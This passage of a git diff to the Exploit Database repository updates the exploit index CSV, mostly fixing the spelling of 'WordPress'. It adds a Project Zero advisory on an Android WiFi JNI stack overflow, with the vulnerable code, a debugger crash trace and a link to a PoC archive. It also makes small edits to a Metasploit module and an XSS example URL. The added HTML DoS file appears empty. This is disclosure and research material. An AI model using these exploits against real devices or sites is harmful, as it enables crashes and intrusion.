1.1.1 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0 -40783,platforms/php/webapps/40783.txt,"Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0 +40771,platforms/php/webapps/40771.txt,"WordPress Plugin Answer My Question 1.3 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0 +40772,platforms/php/webapps/40772.txt,"WordPress Plugin Sirv 1.3.1 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0 +40782,platforms/php/webapps/40782.txt,"WordPress Plugin BBS e-Franchise 1.1.1 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0 +40783,platforms/php/webapps/40783.txt,"WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0 40776,platforms/php/webapps/40776.txt,"EditMe CMS - Cross-Site Request Forgery (Add New Admin)",2016-11-18,Vulnerability-Lab,php,webapps,0 40791,platforms/php/webapps/40791.txt,"ScriptCase 8.1.053 - Multiple Vulnerabilities",2016-11-20,hyp3rlinx,php,webapps,0 40794,platforms/java/webapps/40794.txt,"Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal",2016-11-21,"Julien Ahrens",java,webapps,0 @@ -36874,14 +36876,14 @@ id,file,description,date,author,platform,type,port 40801,platforms/php/webapps/40801.txt,"LEPTON 2.2.2 - Remote Code Execution",2016-11-21,"Curesec Research Team",php,webapps,80 40802,platforms/php/webapps/40802.txt,"FUDforum 3.0.6 - Cross-Site Scripting / Cross-Site Request Forgery",2016-11-21,"Curesec Research Team",php,webapps,80 40803,platforms/php/webapps/40803.txt,"FUDforum 3.0.6 - Local File Inclusion",2016-11-21,"Curesec Research Team",php,webapps,80 -40804,platforms/php/webapps/40804.txt,"Wordpress Plugin Olimometer 2.56 - SQL Injection",2016-11-21,"TAD GROUP",php,webapps,0 +40804,platforms/php/webapps/40804.txt,"WordPress Plugin Olimometer 2.56 - SQL Injection",2016-11-21,"TAD GROUP",php,webapps,0 40809,platforms/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,php,webapps,0 40816,platforms/xml/webapps/40816.txt,"SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML External Entity Injection",2016-11-22,ERPScan,xml,webapps,0 40826,platforms/php/webapps/40826.py,"Osticket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps,0 40895,platforms/multiple/webapps/40895.py,"Splunk Enterprise 6.4.3 - Server-Side Request Forgery",2016-12-09,Security-Assessment.com,multiple,webapps,0 40837,platforms/hardware/webapps/40837.txt,"Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting",2016-11-28,Vulnerability-Lab,hardware,webapps,0 40842,platforms/java/webapps/40842.txt,"Red Hat JBoss EAP - Deserialization of Untrusted Data",2016-11-28,"Mediaservice.net Srl.",java,webapps,8080 -40850,platforms/php/webapps/40850.txt,"Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion",2016-11-30,"Lenon Leite",php,webapps,0 +40850,platforms/php/webapps/40850.txt,"WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion",2016-11-30,"Lenon Leite",php,webapps,0 40851,platforms/php/webapps/40851.txt,"Joomla! Component Catalog 1.0.7 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0 40852,platforms/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0 40853,platforms/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,hardware,webapps,0 @@ -36896,7 +36898,7 @@ id,file,description,date,author,platform,type,port 40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' Parameter SQL Injection",2016-12-13,"Elar Lang",php,webapps,80 40932,platforms/php/webapps/40932.txt,"WHMCS Addon VMPanel 2.7.4 - SQL Injection",2016-12-16,ZwX,php,webapps,80 40934,platforms/php/webapps/40934.html,"WordPress Plugin Quiz And Survey Master 4.5.4 / 4.7.8 - Cross-Site Request Forgery",2016-12-16,dxw,php,webapps,80 -40939,platforms/php/webapps/40939.txt,"Wordpress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0 -40940,platforms/php/webapps/40940.txt,"Wordpress Plugin WP Private Messages 1.0.1 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0 +40939,platforms/php/webapps/40939.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0 +40940,platforms/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0 40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0 40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0 diff --git a/platforms/android/dos/40945.txt b/platforms/android/dos/40945.txt new file mode 100755 index 000000000..4e629f458 --- /dev/null +++ b/platforms/android/dos/40945.txt @@ -0,0 +1,138 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=958 + +The following code in frameworks/opt/net/wifi/service/jni/com_android_server_wifi_WifiNative.cpp doesn't validate the parameter params.num_bssid, and then copies that number of elements into a stack-allocated wifi_bssid_hotlist_params structure. I don't think this can be reached from an untrusted_app context; but it can be reached from a context with system_api_service access; so a compromised platform app or one of several lower privileged system services (bluetooth, nfc etc.). + +static jboolean android_net_wifi_setHotlist( + JNIEnv *env, jclass cls, jint iface, jint id, jobject ap) { + + JNIHelper helper(env); + wifi_interface_handle handle = getIfaceHandle(helper, cls, iface); + ALOGD("setting hotlist on interface[%d] = %p", iface, handle); + + wifi_bssid_hotlist_params params; + memset(¶ms, 0, sizeof(params)); + + params.lost_ap_sample_size = helper.getIntField(ap, "apLostThreshold"); + + JNIObject array = helper.getArrayField( + ap, "bssidInfos", "[Landroid/net/wifi/WifiScanner$BssidInfo;"); + params.num_bssid = helper.getArrayLength(array); + + if (params.num_bssid == 0) { + ALOGE("setHotlist array length was 0"); + return false; + } + + for (int i = 0; i < params.num_bssid; i++) { // <--- no validation on num_bssid + JNIObject objAp = helper.getObjectArrayElement(array, i); + + JNIObject macAddrString = helper.getStringField(objAp, "bssid"); + if (macAddrString == NULL) { + ALOGE("Error getting bssid field"); + return false; + } + + ScopedUtfChars chars(env, macAddrString); + const char *bssid = chars.c_str(); + if (bssid == NULL) { + ALOGE("Error getting bssid"); + return false; + } + parseMacAddress(bssid, params.ap[i].bssid); // <--- params.ap has 128 elements. + + mac_addr addr; + memcpy(addr, params.ap[i].bssid, sizeof(mac_addr)); + + char bssidOut[32]; + snprintf(bssidOut, sizeof(bssidOut), "%0x:%0x:%0x:%0x:%0x:%0x", addr[0], + addr[1], addr[2], addr[3], addr[4], addr[5]); + + ALOGD("Added bssid %s", bssidOut); + + params.ap[i].low = helper.getIntField(objAp, "low"); + params.ap[i].high = helper.getIntField(objAp, "high"); + } + +See attached for a POC which causes a crash before the function with the corrupted stack frame returns and checks the stack cookie. + +LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA +[---------------------------------------------------------------------REGISTERS----------------------------------------------------------------------] +*X0 0x80000000 <-- 0x0 +*X1 0x0 +*X2 0x707882c3e0 <-- u'c0:1d:b3:3f:01:...' +*X3 0x3 +*X4 0x709bf05fc0 <-- stp x28, x27, [sp, #-0x60]! +*X5 0x709c1f07b0 (art::gJniNativeInterface) <-- 0x0 +*X6 0x709bf27034 <-- cbz x2, #0x709bf27040 /* u'b' */ +*X7 0x284801ff284800ff +*X8 0xc01d0142c01d0229 +*X9 0x1 +*X10 0xc01d0142c01d0141 +*X11 0x7082dff4e8 <-- 0x41013fb31dc0 + X12 0x0 +*X13 0x0 +*X14 0x0 +*X15 0x33511e057221be +*X16 0x709f0035a0 (pthread_getspecific@got.plt) --> 0x709efaad5c (pthread_getspecific) <-- movz w8, #0x8000, lsl #16 +*X17 0x709efaad5c (pthread_getspecific) <-- movz w8, #0x8000, lsl #16 +*X18 0x0 +*X19 0x707882c3e0 <-- u'c0:1d:b3:3f:01:...' +*X20 0x7082dfe0a0 --> 0x70833c1470 --> 0x7083381c0c (android::JNIObject<_jobject*>::~JNIObject()) <-- adrp x2, #0x70833c2000 +*X21 0x7082dfe0b8 --> 0x70833c1490 --> 0x7083381c70 (android::JNIObject<_jstring*>::~JNIObject()) <-- adrp x2, #0x70833c2000 +*X22 0x7082dfe078 <-- 0x0 +*X23 0xb1da807287fa8cf +*X24 0x709f00e86c (je_tsd_tsd) <-- 0xa880000000 +*X25 0x7082dfe8d8 <-- u'c0:1d:b3:3f:1:4...' +*X26 0x200011 +*X27 0x7082dfe0d0 <-- 0x100000000001 +*X28 0x707882c3e0 <-- u'c0:1d:b3:3f:01:...' +*SP 0x70815310f0 <-- 0x0 +*PC 0x709efaada8 (pthread_getspecific+76) <-- ldr x10, [x10, #0xe0] +[------------------------------------------------------------------------CODE------------------------------------------------------------------------] + => 0x709efaada8L ldr x10, [x10, #0xe0] + 0x709efaadacL cmp x10, x9 + 0x709efaadb0L b.ne #pthread_getspecific+56 <0x709efaad94> +... + 0x709efaad94L mov x0, xzr + 0x709efaad98L str xzr, [x8] + 0x709efaad9cL ret + + 0x709efaada0L add x10, x10, x8, lsl #4 + 0x709efaada4L add x8, x10, #0xe8 + => 0x709efaada8L ldr x10, [x10, #0xe0] + 0x709efaadacL cmp x10, x9 + 0x709efaadb0L b.ne #pthread_getspecific+56 <0x709efaad94> +[------------------------------------------------------------------------CODE------------------------------------------------------------------------] +155 in bionic/libc/bionic/pthread_key.cpp +[-----------------------------------------------------------------------STACK------------------------------------------------------------------------] +00:0000| sp 0x70815310f0 <-- 0x0 +... +04:0020| 0x7081531110 --> 0x3f800000 <-- 0x0 +05:0028| 0x7081531118 <-- 0x0 +... +[---------------------------------------------------------------------BACKTRACE----------------------------------------------------------------------] +> f 0 709efaada8 pthread_getspecific+76 + f 1 709efd2394 je_free+68 + f 2 709efd2394 je_free+68 + f 3 709efd2394 je_free+68 + f 4 709efd2394 je_free+68 + f 5 7083387d10 + f 6 7083387d10 + f 7 7083387d10 +Program received signal SIGSEGV (fault address 0x1d0142c01d0221) +pwndbg> bt +#0 pthread_getspecific (key=) at bionic/libc/bionic/pthread_key.cpp:160 +#1 0x000000709efd2394 in je_tsd_wrapper_get () at external/jemalloc/include/jemalloc/internal/tsd.h:609 +#2 je_tsd_get () at external/jemalloc/include/jemalloc/internal/tsd.h:609 +#3 je_tsd_fetch () at external/jemalloc/include/jemalloc/internal/tsd.h:614 +#4 je_free (ptr=0x707882c3e0) at external/jemalloc/src/jemalloc.c:1932 +#5 0x0000007083387d10 in _JNIEnv::ReleaseStringUTFChars (utf=0x707882c3e0 "c0:1d:b3:3f:01:"..., string=0x200011, this=0x7091fd2b00) at libnativehelper/include/nativehelper/jni.h:851 +#6 ScopedUtfChars::~ScopedUtfChars (this=, __in_chrg=) at libnativehelper/include/nativehelper/ScopedUtfChars.h:45 +#7 android::android_net_wifi_setHotlist (env=0x7091fd2b00, cls=, iface=, id=0x690a3633, ap=) at frameworks/opt/net/wifi/service/jni/com_android_server_wifi_WifiNative.cpp:799 +#8 0x000000709b1a084c in ?? () + +Fixed in https://source.android.com/security/bulletin/2016-12-01.html + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40945.zip diff --git a/platforms/linux_mips/remote/40740.rb b/platforms/linux_mips/remote/40740.rb index 432432062..dc5ff55b4 100755 --- a/platforms/linux_mips/remote/40740.rb +++ b/platforms/linux_mips/remote/40740.rb @@ -15,13 +15,13 @@ By sending certain TR-064 commands, we can instruct the modem to open port 80 on Proof of Concept ================ +=end + ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## -=end - require 'msf/core' class MetasploitModule < Msf::Exploit::Remote diff --git a/platforms/php/webapps/13925.txt b/platforms/php/webapps/13925.txt index 1a466ffde..3b79c7b8e 100755 --- a/platforms/php/webapps/13925.txt +++ b/platforms/php/webapps/13925.txt @@ -21,7 +21,7 @@ action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/others/

diff --git a/platforms/php/webapps/28620.txt b/platforms/php/webapps/28620.txt index 62a8b8737..237a17cfe 100755 --- a/platforms/php/webapps/28620.txt +++ b/platforms/php/webapps/28620.txt @@ -6,4 +6,4 @@ These issues may allow an attacker to access sensitive information, execute arbi Version 1.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/adminpanel/includes/mailinglist/sendemail.php?message_text=</textarea> \ No newline at end of file +http://www.example.com/adminpanel/includes/mailinglist/sendemail.php?message_text= \ No newline at end of file diff --git a/platforms/windows/dos/40946.html b/platforms/windows/dos/40946.html new file mode 100755 index 000000000..04480d482 --- /dev/null +++ b/platforms/windows/dos/40946.html @@ -0,0 +1,188 @@ + + + + + + + + + + + + + + + \ No newline at end of file